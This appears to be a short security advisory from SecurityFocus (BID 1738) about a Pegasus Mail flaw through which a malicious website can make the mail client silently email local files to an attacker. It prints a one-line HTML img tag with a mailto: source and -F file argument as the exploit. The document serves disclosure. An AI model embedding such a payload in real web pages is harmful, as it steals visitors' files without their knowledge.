7 lines
No EOL
511 B
Text
7 lines
No EOL
511 B
Text
source: http://www.securityfocus.com/bid/1738/info
|
|
|
|
It is possible for a malicious website operator to obtain copies of known files on a remote system if a website visitor is running Pegasus Mail client.
|
|
|
|
If the following code were to be inserted into a HTML document and a user were to load that particular webpage, the local file would be automatically sent from the Pegasus Mail client to the email address specified without any prior warning:
|
|
|
|
<img sr c="mailto:email@address.com -F c:\path\file.ext"> |